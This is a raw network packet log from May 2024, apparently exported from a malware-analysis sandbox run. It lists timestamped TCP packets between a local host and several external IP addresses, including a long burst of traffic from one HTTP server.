May 26, 2024 10:30:36.679816961 CEST	443	49727	188.114.96.3	192.168.2.5
May 26, 2024 10:30:36.681413889 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:36.681549072 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:36.681575060 CEST	443	49727	188.114.96.3	192.168.2.5
May 26, 2024 10:30:36.681647062 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:36.681657076 CEST	443	49727	188.114.96.3	192.168.2.5
May 26, 2024 10:30:37.631448984 CEST	443	49727	188.114.96.3	192.168.2.5
May 26, 2024 10:30:37.631716013 CEST	443	49727	188.114.96.3	192.168.2.5
May 26, 2024 10:30:37.631750107 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:37.631788969 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:38.335236073 CEST	49728	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:38.335290909 CEST	443	49728	188.114.96.3	192.168.2.5
May 26, 2024 10:30:38.335365057 CEST	49728	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:38.335618973 CEST	49728	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:38.335640907 CEST	443	49728	188.114.96.3	192.168.2.5
May 26, 2024 10:30:38.822873116 CEST	443	49728	188.114.96.3	192.168.2.5
May 26, 2024 10:30:38.822999954 CEST	49728	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:38.824101925 CEST	49728	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:38.824124098 CEST	443	49728	188.114.96.3	192.168.2.5
May 26, 2024 10:30:38.824911118 CEST	443	49728	188.114.96.3	192.168.2.5
May 26, 2024 10:30:38.826229095 CEST	49728	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:38.826355934 CEST	49728	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:38.826400042 CEST	443	49728	188.114.96.3	192.168.2.5
May 26, 2024 10:30:39.618923903 CEST	443	49728	188.114.96.3	192.168.2.5
May 26, 2024 10:30:39.619169950 CEST	443	49728	188.114.96.3	192.168.2.5
May 26, 2024 10:30:39.619241953 CEST	49728	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:39.625490904 CEST	49728	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:39.625518084 CEST	443	49728	188.114.96.3	192.168.2.5
May 26, 2024 10:30:39.663781881 CEST	49729	80	192.168.2.5	185.235.137.54
May 26, 2024 10:30:39.725557089 CEST	80	49729	185.235.137.54	192.168.2.5
May 26, 2024 10:30:39.725686073 CEST	49729	80	192.168.2.5	185.235.137.54
May 26, 2024 10:30:39.725806952 CEST	49729	80	192.168.2.5	185.235.137.54
May 26, 2024 10:30:39.780474901 CEST	80	49729	185.235.137.54	192.168.2.5
May 26, 2024 10:30:54.294137955 CEST	80	49725	23.145.40.124	192.168.2.5
May 26, 2024 10:30:54.294262886 CEST	49725	80	192.168.2.5	23.145.40.124
May 26, 2024 10:30:54.294301987 CEST	49725	80	192.168.2.5	23.145.40.124
May 26, 2024 10:30:54.296631098 CEST	49731	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:54.306638002 CEST	80	49725	23.145.40.124	192.168.2.5
May 26, 2024 10:30:54.355513096 CEST	80	49731	190.187.52.42	192.168.2.5
May 26, 2024 10:30:54.355632067 CEST	49731	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:54.355801105 CEST	49731	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:54.355818987 CEST	49731	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:54.408689022 CEST	80	49731	190.187.52.42	192.168.2.5
May 26, 2024 10:30:54.455656052 CEST	80	49731	190.187.52.42	192.168.2.5
May 26, 2024 10:30:55.749445915 CEST	80	49731	190.187.52.42	192.168.2.5
May 26, 2024 10:30:55.754674911 CEST	80	49731	190.187.52.42	192.168.2.5
May 26, 2024 10:30:55.754762888 CEST	49731	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:55.773396015 CEST	49731	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:55.778278112 CEST	80	49731	190.187.52.42	192.168.2.5
May 26, 2024 10:30:55.849545956 CEST	49732	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:55.854537964 CEST	80	49732	190.187.52.42	192.168.2.5
May 26, 2024 10:30:55.854760885 CEST	49732	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:55.854760885 CEST	49732	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:55.854789972 CEST	49732	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:55.908698082 CEST	80	49732	190.187.52.42	192.168.2.5
May 26, 2024 10:30:55.955388069 CEST	80	49732	190.187.52.42	192.168.2.5
May 26, 2024 10:30:57.017582893 CEST	80	49732	190.187.52.42	192.168.2.5
May 26, 2024 10:30:57.022208929 CEST	80	49732	190.187.52.42	192.168.2.5
May 26, 2024 10:30:57.022505045 CEST	49732	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:57.022505045 CEST	49732	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:57.024288893 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.037026882 CEST	80	49732	190.187.52.42	192.168.2.5
May 26, 2024 10:30:57.087615013 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.087941885 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.087943077 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.140479088 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.790154934 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.792354107 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.792535067 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.797133923 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.797169924 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.797234058 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.806745052 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.806778908 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.806863070 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.816397905 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.816431999 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.816497087 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.827008963 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.827043056 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.827074051 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.827214956 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.828793049 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.828886032 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.910897017 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.912029028 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.912246943 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.914961100 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.917987108 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.918066025 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.920967102 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.923970938 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.924005985 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.924038887 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.924040079 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.924089909 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.929738045 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.930948973 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.930983067 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.931015968 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.935726881 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.935760021 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.935812950 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.940515995 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.940548897 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.940587997 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.945266008 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.945300102 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.945331097 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.945333004 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.945384979 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.949217081 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.949250937 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.949330091 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.952727079 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.952759981 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.952981949 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.956183910 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.956218004 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:57.956269026 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:57.999056101 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.030915976 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.031148911 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.031724930 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.033830881 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.033864975 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.033906937 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.035907030 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.035976887 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.037926912 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.037960052 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.038022041 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.040201902 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.041290045 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.041374922 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.042967081 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.042999983 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.043056011 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.046277046 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.046309948 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.046361923 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.049552917 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.049586058 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.049645901 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.052844048 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.052875996 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.052908897 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.052948952 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.055691004 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.055726051 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.055757999 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.058218956 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.058250904 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.058281898 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.062835932 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.062868118 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.062903881 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.062922001 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.062954903 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.062992096 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.065291882 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.065325022 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.065354109 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.065356016 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.065404892 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.069324970 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.069358110 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.069417953 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.069969893 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.070002079 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.070050955 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.071687937 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.072835922 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.072902918 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.073857069 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.073892117 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.073971033 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.075779915 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.076745987 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.076783895 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.076807976 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.078705072 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.078739882 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.078772068 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.078775883 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.078830004 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.119919062 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.120111942 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.120306015 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.121180058 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.121885061 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.121948004 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.122818947 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.122858047 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.122914076 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.124603987 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.151612997 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.151727915 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.151824951 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.152620077 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.152673960 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.153429031 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.153464079 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.153520107 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.154226065 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.155076981 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.155134916 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.155901909 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.155937910 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.155996084 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.157490969 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.157526970 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.157577038 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.158365965 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.158404112 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.158451080 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.159974098 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.160007954 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.160063028 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.161286116 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.161319971 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.161365986 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.162591934 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.162626028 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.162688017 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.163893938 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.163928032 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.163959980 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.163974047 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.164341927 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.165163994 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.165210962 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.166224003 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.166610003 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.166660070 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.167133093 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.167679071 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.167730093 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.168248892 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.168823957 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.168881893 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.169329882 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.169892073 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.169940948 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.170454025 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.170505047 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.170552969 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.171029091 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.171578884 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.171633959 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.172135115 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.172168016 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.172218084 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.172966957 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.173557997 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.173631907 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.174133062 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.174166918 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.174213886 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.175225973 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.175770044 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.175817966 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.176342010 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.176373959 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.176429987 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.177411079 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.177444935 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.177491903 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.177932024 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.209407091 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.209465981 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.209614038 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.211298943 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.211347103 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.211386919 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.211667061 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.211683035 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.211715937 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.212039948 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.212085962 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.212584972 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.212600946 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.212663889 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.213591099 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.213607073 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.213619947 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.213656902 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.215018988 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.215076923 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.241807938 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.241859913 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.241874933 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.241895914 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.241905928 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.241938114 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.242631912 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.242954969 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.242969990 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.243000984 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.243921995 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.243969917 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.244404078 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.244420052 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.244434118 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.244462967 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.245384932 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.245439053 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.245893955 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.245908976 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.245960951 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.250041962 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.250056982 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.250107050 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.250278950 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.250294924 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.250339031 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.251210928 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.251225948 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.251239061 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.251271963 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.251492977 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.251507998 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.251538038 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.252259970 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.252274990 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.252310991 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.253063917 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.253078938 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.253108978 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.253863096 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.253879070 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.253926039 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.254641056 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.254657030 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.254668951 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.254687071 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.254717112 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.255433083 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.255448103 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.255498886 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.256222010 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.256238937 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.256285906 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.271742105 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.271962881 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.272033930 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:58.272608042 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:58.272639990 CEST	80	49733	91.202.233.231	192.168.2.5
